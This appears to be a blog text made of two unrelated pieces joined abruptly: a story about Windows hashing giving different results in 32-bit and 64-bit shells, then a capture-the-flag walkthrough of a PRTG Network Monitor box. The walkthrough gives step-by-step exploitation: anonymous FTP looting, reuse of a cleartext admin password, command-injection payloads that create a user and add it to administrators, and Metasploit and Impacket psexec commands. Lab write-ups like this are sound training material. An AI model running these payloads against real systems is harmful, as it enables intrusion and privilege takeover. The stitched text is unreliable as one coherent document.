The other day I was working on a little project of mine and accidentally discovered that Windows is able to produce different hash values for the same input.
wat?!
The problem is that 64-bit and 32-bit PowerShell produce different hash values for the same input when using built-in functionality like Get-FileHash or binaries like certutil. The behavior is not restricted to PowerShell but extends to CMD as well.
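If you want to reproduce the comparison yourself, the commands look roughly like this (the file path is only a placeholder for whatever input you want to hash; run this on a 64-bit Windows installation):

    # 64-bit PowerShell
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Get-FileHash -Algorithm SHA256 C:\some\file.bin"

    # 32-bit PowerShell on the same 64-bit Windows
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "Get-FileHash -Algorithm SHA256 C:\some\file.bin"

    # Same idea with certutil, once from a 64-bit and once from a 32-bit CMD
    # (C:\Windows\System32\cmd.exe vs. C:\Windows\SysWOW64\cmd.exe)
    certutil -hashfile C:\some\file.bin SHA256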
I thought that if somebody actually makes the effort to produce a hash value of something, it is usually for something important and not just for fun, which would mean that it matters whether the hashing algorithm actually works as intended. But when I reported the problem to the Microsoft Security Center I got the following answer:
What you’re reporting appears to be a bug/product suggestion, but would not meet the bar for security servicing.
So I guess it's “not that important”.
Anyway, I thought it was nice to know and wanted to share this little story.
UPDATE – 11th May 2020:
To be honest, I was a little dissatisfied with Microsoft’s response. For this reason, I decided to ask people who are absolute experts in the field of IT security in the hope that they could explain to me how the behavior comes about. And I could hardly believe my eyes when Tavis Ormandy took the time to answer my question (which I am very happy and grateful for).
After receiving the email I tried to verify the explanation on one of my machines. I guess my assumption that this was a bug was wrong and that it is more of a feature: a required feature which, as Tavis himself wrote, delivers a surprising result in this case. Thanks Tavis for the explanation.
First off we use Nmap to scan for open ports on the target system. Figure 1 shows all open ports including the results of a version scan with Nmap (-sV). As we can see, the target machine offers an FTP service with anonymous login enabled.
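The scan itself is nothing fancy, basically a plain version scan (the target IP is a placeholder):

    nmap -sV <target-ip>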
Thanks to the anonymous login we can log on to the system via FTP with the username anonymous and an empty password. After authentication we are able to see multiple directories as shown in figure 1. Inside the Users directory we find the home directory of the user Public, and inside /Users/Public we find the user.txt flag, which we download to our local system via get user.txt. This gives us the first flag as shown in figure 2. The next step is to take a look at the HTTP server on port 80 that we saw in figure 1. When we browse the website we see a login form for an application called PRTG Network Monitor.
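For completeness, the FTP part up to this point boils down to a handful of commands (the target IP is a placeholder; log in as anonymous with an empty password):

    ftp <target-ip>
    cd /Users/Public
    get user.txt
    bye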
Now we do a little research on Google to find useful information about the application. Things we might want to look up are default credentials and known vulnerabilities for PRTG.
Finding the default credentials for PRTG on the web is pretty easy, but they won't grant us any access to the application. However, there are two interesting vulnerabilities that can be found online. The first one is a credential leak where the application may store user passwords in cleartext in backup files of its configuration (LINK). The second one is a command injection that allows an authenticated user to execute local commands on the underlying system (LINK). If the application is vulnerable to the command injection we might even gain system access with the highest privileges right away, because when PRTG is installed with the default configuration the vulnerable service runs as local system (LINK).
The first thing we want to do is check whether we can get access to the application by finding stored passwords in backups of the configuration file. To do so we use FTP with an anonymous login once again and browse the directory mentioned in the article that describes the vulnerability (LINK). Indeed, we find a backup of an old configuration file called “PRTG Configuration.old.bak”. We download the backup file to our machine and search it for stored passwords. As figure 5 shows, the backup file contains a cleartext password for the user prtgadmin, which is the default administrative user of the application. But when we try this username and password on the website, the login fails. Since the password is from 2018 we do what users usually do and increment the number in the password. With prtgadmin as username and PrTg@dmin2019 as password we are able to successfully log in to the application.
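For reference, retrieving and searching the backup looks roughly like this (the directory is the one named in the linked article, and depending on your FTP client the file name with spaces may need quoting):

    ftp <target-ip>
    cd "<directory from the article>"
    get "PRTG Configuration.old.bak"
    bye
    grep -i password "PRTG Configuration.old.bak"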
The next step is to find out whether the command injection vulnerability works on the target machine. After reading through the article that describes the vulnerability (LINK), we create a notification called add_user_off that executes a ping to our attacking machine, as shown in figure 6.
After triggering the notification the command gets executed and we receive ICMP echo requests from the target system, as shown in figure 7.
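In case you want to recreate this: based on the public write-ups of this vulnerability, the parameter field of the notification contains something along these lines, while tcpdump catches the pings on the attacking machine (the attacker IP and the interface name depend on your setup):

    test.txt; ping <attacker-ip>

    tcpdump -i tun0 icmp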
At this point we have verified that the target system is vulnerable to the command injection, but we still have to find a way to exploit it so that we get access to the machine itself. One thing the author of the original article did was to create a new local user, so we do that as well and create a user called oit with the password OffensiveIT!, as shown in figure 8. As already mentioned, by default the vulnerable PRTG service runs as local system, which means that if this is the case here we can add our new user to the administrators group. We test this right away by creating a new notification with the name changetoadm which executes the command shown in figure 9.
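The parameters of the two notifications look roughly like this (again based on the linked write-up; user name and password are the ones mentioned above):

    test.txt; net user oit OffensiveIT! /add

    test.txt; net localgroup administrators oit /add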
If everything worked as intended we should now be able to execute commands on the target system using PsExec. One way to do so is the corresponding module in Metasploit, as shown in figure 10.
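A minimal sketch of the Metasploit approach, using the exploit/windows/smb/psexec module and a placeholder target IP:

    msfconsole
    use exploit/windows/smb/psexec
    set RHOSTS <target-ip>
    set SMBUser oit
    set SMBPass OffensiveIT!
    run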
But using Metasploit only for PsExec is a bit like bringing an assault rifle to a knife fight. Another way of doing it is the psexec.py script from Impacket, as shown in figure 11.
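With Impacket this is essentially a one-liner (depending on your installation the script may be called psexec.py or impacket-psexec; the target IP is a placeholder):

    psexec.py 'oit:OffensiveIT!@<target-ip>'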